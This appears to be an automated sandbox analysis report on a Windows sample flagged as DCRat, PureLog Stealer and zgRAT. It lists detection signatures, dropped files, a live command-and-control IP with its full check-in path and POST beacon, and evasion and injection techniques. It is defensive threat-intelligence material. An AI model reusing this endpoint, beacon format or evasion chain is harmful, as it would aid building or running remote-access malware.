Windows Analysis Report
C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Overview

General Information

Sample name:	C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
Analysis ID:	1431496
MD5:	6acbb1fb58dccd74db667187b22de689
SHA1:	cf0df5b247b15157cfce47473d1b063705d10b44
SHA256:	c792057cb761da8872421a6c906c4481b260bdb5d27b86378efdd2af39319687
Tags:	DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Sigma detected: Stop EventLog

Snort IDS alert for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Found direct / indirect Syscall (likely to bypass EDR)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

Modifies the hosts file

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://176.123.168.151	Avira URL Cloud: Label: malware
Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows	Avira URL Cloud: Label: malware
Source: http://176.123.168.151	Avira URL Cloud: Label: malware
Source: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window	Avira URL Cloud: Label: malware
Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Avira: detection malicious, Label: TR/Kryptik.gqhhv
Source: C:\Users\user\Desktop\zQhPhksn.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Recovery\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\PerfDll\hyperProviderSavesinto.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\WiKMUFpI.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Avira: detection malicious, Label: TR/Kryptik.gqhhv
Source: C:\Users\user\Desktop\LugVktua.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\KEMGRwnV.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Multi AV Scanner detection for domain / URL

Source: https://176.123.168.151	Virustotal: Detection: 5%			Perma Link
Source: http://176.123.168.151	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\PerfDll\hyperProviderSavesinto.exe	ReversingLabs: Detection: 87%
Source: C:\PerfDll\hyperProviderSavesinto.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	ReversingLabs: Detection: 81%
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Recovery\RuntimeBroker.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\RuntimeBroker.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Recovery\WmiPrvSE.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\WmiPrvSE.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Virustotal: Detection: 52%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\Desktop\IkSFhrpY.log	Virustotal: Detection: 25%	Perma Link
Source: C:\Users\user\Desktop\KEMGRwnV.log	ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\KEMGRwnV.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\LugVktua.log	Virustotal: Detection: 19%	Perma Link
Source: C:\Users\user\Desktop\WiKMUFpI.log	ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\WiKMUFpI.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\msAjSsFc.log	Virustotal: Detection: 25%	Perma Link
Source: C:\Users\user\Desktop\phOzxInG.log	Virustotal: Detection: 11%	Perma Link
Source: C:\Users\user\Desktop\vsaRQqFM.log	Virustotal: Detection: 11%	Perma Link
Source: C:\Users\user\Desktop\zQhPhksn.log	Virustotal: Detection: 19%	Perma Link
Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	Virustotal: Detection: 73%	Perma Link

Multi AV Scanner detection for submitted file

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	ReversingLabs: Detection: 60%
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Virustotal: Detection: 69%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Joe Sandbox ML: detected
Source: C:\Recovery\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\PerfDll\hyperProviderSavesinto.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Joe Sandbox ML: detected
Source: C:\Recovery\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D7ECA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D6647C
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D930F0 FindFirstFileExA,	0_2_00007FF7F4D930F0
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00D5A69B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	1_2_00D6C220
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98DCE0 FindFirstFileExW,	7_2_000001B0BB98DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FDCE0 FindFirstFileExW,	9_2_00000216D26FDCE0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93EDCE0 FindFirstFileExW,	38_2_00000150E93EDCE0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9DCE0 FindFirstFileExW,	40_2_00000267FCE9DCE0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52DCE0 FindFirstFileExW,	45_2_000002359B52DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64DCE0 FindFirstFileExW,	49_2_00000225DC64DCE0

Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		8_2_00007FFD9BC4D87D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		20_2_00007FFD9BC7D87D

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 176.123.168.151:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SPEEDYLINERU SPEEDYLINERU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: POST /4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 176.123.168.151Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151

Source: unknown

Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.123.168.151
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows
Source: hyperProviderSavesinto.exe, 00000008.00000002.1733479923.0000000003304000.00000004.00000800.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://176.123.168.151
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown

HTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	38_2_00000150E93E253C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E202C NtQuerySystemInformation,StrCmpNIW,	38_2_00000150E93E202C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E2244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	38_2_00000150E93E2244
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,	46_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,	49_2_00000225DC6428C8

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe

Code function: 1_2_00D56FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

1_2_00D56FAA

Creates files inside the system directory

Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\e3a74901549792	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\e3a74901549792	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D75664	0_2_00007FF7F4D75664
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D83FCC	0_2_00007FF7F4D83FCC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6A8AC	0_2_00007FF7F4D6A8AC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D80998	0_2_00007FF7F4D80998
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7625C	0_2_00007FF7F4D7625C
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6DC08	0_2_00007FF7F4D6DC08
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7ECA0	0_2_00007FF7F4D7ECA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8BDB8	0_2_00007FF7F4D8BDB8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6BF08	0_2_00007FF7F4D6BF08
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D92EE4	0_2_00007FF7F4D92EE4
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D98FC8	0_2_00007FF7F4D98FC8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6E8D8	0_2_00007FF7F4D6E8D8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8C034	0_2_00007FF7F4D8C034
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7C9F0	0_2_00007FF7F4D7C9F0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D959A0	0_2_00007FF7F4D959A0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6B944	0_2_00007FF7F4D6B944
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D83FCC	0_2_00007FF7F4D83FCC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6B314	0_2_00007FF7F4D6B314
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D672AC	0_2_00007FF7F4D672AC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8FCD8	0_2_00007FF7F4D8FCD8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D954D0	0_2_00007FF7F4D954D0
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5848E	1_2_00D5848E
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D540FE	1_2_00D540FE
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D64088	1_2_00D64088
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D600B7	1_2_00D600B7
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D751C9	1_2_00D751C9
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D67153	1_2_00D67153
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D662CA	1_2_00D662CA
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D532F7	1_2_00D532F7
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D643BF	1_2_00D643BF
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D7D440	1_2_00D7D440
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5F461	1_2_00D5F461
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5C426	1_2_00D5C426
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D677EF	1_2_00D677EF
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D7D8EE	1_2_00D7D8EE
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5286B	1_2_00D5286B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D819F4	1_2_00D819F4
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5E9B7	1_2_00D5E9B7
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D66CDC	1_2_00D66CDC
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D63E0B	1_2_00D63E0B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5EFE2	1_2_00D5EFE2
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D74F9A	1_2_00D74F9A
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB951F2C	7_2_000001B0BB951F2C
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB95D0E0	7_2_000001B0BB95D0E0
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB9638A8	7_2_000001B0BB9638A8
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB982B2C	7_2_000001B0BB982B2C
